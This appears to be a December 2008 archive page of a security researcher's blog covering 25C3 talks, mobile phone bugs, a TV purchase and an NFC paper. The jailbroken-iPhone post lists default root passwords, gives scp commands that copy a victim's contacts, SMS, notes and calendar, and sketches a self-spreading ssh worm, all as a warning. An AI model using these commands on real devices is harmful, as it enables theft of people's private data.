...stuff I do and things I like...

Wednesday, December 31 2008

Curse of Silence, a Symbian S60 SMS Exploit (25C3)

Today Tobias Engel presented his SMS exploit for Symbian S60. The exploit basically prevents the attacked phone from receiving any SMS. F-Secure has a nice writeup on their blog over here: Curse of Silence, a Symbian S60 SMS Exploit

Update: get the advisory and demo video from: http://berlin.ccc.de/~tobias/cos/

Tuesday, December 30 2008

25C3 Days 3 and 4

Day three was really hardcore, with many good talks such as how to run your own GSM network, RFID Security, DECT In-Security, Cisco exploits and attacks using office documents. Of course I couldn't see all of them, but the videos of most talks are already available.

My NFC talk went quite nicely I think. Although I ran about 20 minutes overtime, I didn't get thrown off the stage, so I just continued :-)

Day four was very short for me since we already left at 2 o'clock to catch our flight. I only attended the Debian RNG talk, which was very nice, with good demos and fun slides.

All in all the congress was just awesome, although it was way too crowded the first two days.

Happy new year everybody!

Monday, December 29 2008

25c3 Day 2

I saw Harald's talk on smartphone hardware, which was quite interesting. I also saw Ben's talk; since we had nice seats in Saal 1, that talk was nice too :-)

I got some nice feedback for my talk, thanks everybody! I do think I spent too much time on the boring introduction, though. Next time I will remove some slides instead of planning to skip them.

Sunday, December 28 2008

25C3 Day 1

The first day of 25C3 has been great fun. I attended 3 talks: PLC (the power line stuff), 202c, iPhone dev-team, and SS7. I must say the SS7 talk was the best. The iPhone talk was boring (maybe they showed something interesting in the last 10 minutes, but I left before the end).

The congress is really packed with people; they sold all tickets (3800) on the first day.

Good night.

Wednesday, December 24 2008

eCL0WN by Jeroen van Beek

At Black Hat Japan I told Jeroen about NFC mobile phones and that you can use those as a normal RFID reader/writer, and that we/he should make a passport reading tool. It seems that he got to work and made a really cool passport cloning tool that runs on Nokia's NFC phones. Nice work Jeroen!!

The tool and some nice screen shots are available at his website: dexlab.nl

Friday, December 19 2008

HTC Touch vCard over IP Denial of Service

Here is another nice Windows Mobile (HTC) security bug that is related to WAP push. The vulnerability can be triggered by sending vCards to port 9204/UDP over either WiFi or GPRS/UMTS. The effect seems to be a significant device slowdown and/or a device freeze that requires removing the battery. This again reminds me of my good old MMS Notification DoS attack.

The bug was discovered by the Mobile Security Lab (whoever this is). I hope we will see more interesting discoveries from them; they seem to have only set up their site in October.

The Danger of Jailbroken iPhones (not really news)

First, I know I'm not the first one to write/warn about this, so don't flame me for it.

I recently jailbroke my iPhone so I could take a closer look at the iPhone and its OS. Like most people I just used the PwnageTool from the iPhone Dev-Team. It is easy, fast and just works. What most people forget is that the jailbroken iPhone OS comes with an ssh server and that the root and mobile users have their password set to alpine (the mobile password is dottie). This basically means that everybody can log into every jailbroken iPhone as user root. When I jailbroke my iPhone I didn't change my password right away since I was too busy playing with the new features, and I strongly believe that many other people never change the password of their jailbroken iPhone.

Again the danger lies in public Wifi hotspots or any other situation where you share Wifi with people you don't know. A good example is the upcoming Chaos Communication Congress which has one of the most hostile (wireless) networks I know.

So what can happen if you leave your iPhone's password unchanged? That is what I cooked up over the last few nights.

The Basics:
  • Anyone can log into your iPhone as user root and/or mobile
  • Anyone can copy files to and from your iPhone using scp
In further detail this means all your private data is gone, just like this:
SSH_PARAMS="-q -o NumberOfPasswordPrompts=1 -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no"
scp $SSH_PARAMS root@$IP:/var/mobile/Library/AddressBook/* /tmp/yourdata/
scp $SSH_PARAMS root@$IP:/var/mobile/Library/SMS/* /tmp/yourdata/
scp $SSH_PARAMS root@$IP:/var/mobile/Library/Notes/* /tmp/yourdata/
scp $SSH_PARAMS root@$IP:/var/mobile/Library/Calendar/* /tmp/yourdata/
The code shown above simply copies your Addressbook, SMS, Notes, and Calendar from your iPhone using scp (secure copy, part of ssh). I know there is much more to steal, like photos, email, or the VPN configuration. This attack is so simple that everybody can do it without any special knowledge or tools.

Getting your personal data stolen can happen to you anywhere, but there is another threat that is more likely at events like the Chaos Communication Congress, DEF CON, and any other conference with a high number of jailbroken iPhones: a worm.

A worm that simply spreads using ssh/scp and the default root/mobile password can be written in bash (which is installed on all jailbroken iPhones) in about 4 hours. The worm just (tries to) copy itself (a bash script) to every host on the local wifi network in the background. Background tasks can easily be set up using launchd: just add a new task that runs the worm shell script every couple of minutes. This is no big deal for anyone with just a basic understanding of ssh, scp, bash, and launchd/launchctl. I was able to do this in an evening, mainly using Google to get the appropriate launchd plist syntax.
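A defender's counterpart to the launchd persistence just described, added here as an example and not code from the original post: it parses a launchd job plist and flags the traits such a job would have (a shell interpreter, a script under a user-writable path, a short StartInterval, RunAtLoad). The two sample plists, their labels and the /var/mobile/.u/run.sh path are constructed for the example.

```python
import plistlib

# Constructed sample of a launchd job in the shape the post describes:
# a shell script under the mobile user's home, re-run every few minutes.
SUSPECT_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key>
  <array><string>/bin/bash</string><string>/var/mobile/.u/run.sh</string></array>
  <key>StartInterval</key><integer>180</integer>
  <key>RunAtLoad</key><true/>
</dict>
</plist>
"""

# Constructed benign job: a system binary, no timer, no RunAtLoad.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>Label</key><string>com.example.daemon</string>
  <key>ProgramArguments</key><array><string>/usr/libexec/exampled</string></array>
</dict>
</plist>
"""

SHELLS = {"/bin/sh", "/bin/bash"}
USER_WRITABLE = ("/var/mobile/", "/private/var/mobile/", "/tmp/", "/var/tmp/")

def audit_launchd_job(plist_bytes):
    """Return the reasons a launchd job looks like script persistence ([] if none)."""
    job = plistlib.loads(plist_bytes)
    args = list(job.get("ProgramArguments", []))
    if not args and "Program" in job:  # jobs may use Program instead of ProgramArguments
        args = [job["Program"]]
    reasons = []
    if args and args[0] in SHELLS:
        reasons.append("runs a shell interpreter")
    for arg in args:
        if arg.startswith(USER_WRITABLE):
            reasons.append("executes from a user-writable path: " + arg)
    interval = job.get("StartInterval")
    if isinstance(interval, int) and interval <= 600:
        reasons.append("re-runs every %d seconds" % interval)
    if job.get("RunAtLoad"):
        reasons.append("runs at boot")
    return reasons
```

Feed it the bytes of each .plist in /Library/LaunchDaemons and /Library/LaunchAgents on the phone; anything it flags that you did not install yourself deserves a look.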

Don't get me wrong, I don't want to encourage anyone to do all this. I just want to show you how damn easy this is. So please change your root/mobile password on your jailbroken iPhone, or somebody else will do it for you.

Btw. if you are looking for the images that the iPhone takes of just about anything you do, some of these are located here: /var/mobile/Library/Caches/Snapshots (of course this is not new either, see here).

Monday, December 15 2008

Samsung LE-40A859

Last weekend Judith and I bought a Samsung LE-40A859 (a big ass LCD TV). We chose this specific device because we got a good deal at a local MediaMarkt store (they actually just matched the average online price). Originally we were looking at a Samsung 40F86BD, but it turns out that this is a really old model, and the alternative Philips model was described as computer unfriendly (in various forums). The first impression of the LE40A859 is really good. Very slim case, lots and lots of inputs and connectors. A really good picture (although I don't really have anything to compare it to).

One of the first things I noticed is that there are no rounded edges when displaying content via the VGA port. The first bad thing I noticed is that the TV didn't detect my new MacBook or Judith's old MacBook using a DVI-to-HDMI adapter. The MacBooks also didn't detect the display at all. Some people in various forums complain about the same problem; on the other hand there are many posts about this combination working fine. So for now I guess that I may have bought a bad DVI-to-HDMI converter or cable. Any hints would be welcome.

The LE40A859 also comes with DLNA. DLNA is an extension/service of UPnP and basically turns the TV into a media player instead of just a display. The media types and frame rates are of course limited, but I got a good part of my content to play. The DLNA server I use is TwonkyVision, which is OK but commercial. Any hints for a decent free DLNA server for Linux? Btw. the TV also plays video files from a USB key or USB disk, which I think is kinda cool.

So now my TV has ethernet (optional WiFi via USB) and an IP address. So guess what I did first? Yes, I did a port scan. I only found one open TCP port at 52396 (probably the UPnP device); it identifies itself as DMRND/0.5. Any ideas what software this is? I also could not determine the OS running on the TV, which would be kind of interesting I think. Not that I want to mess with it, but I just want to know since it sits on my LAN (I probably want to firewall its IP address to prevent it from phoning home).

All in all a good buy, hopefully our MacBooks will talk to it once I change the DVI-to-HDMI adapter.

PS: I don't think about upgrading my media center computer to HD right now since there is just not enough HD content available yet.

Friday, December 12 2008

NFC Paper @ ARES 2009

Today I submitted the camera-ready version of my paper Vulnerability Analysis and Attacks on NFC-enabled Mobile Phones to the Workshop on Sensor Security at ARES 2009. Finally an academic publication again. With that done, I'm now officially on Christmas vacation until 25C3.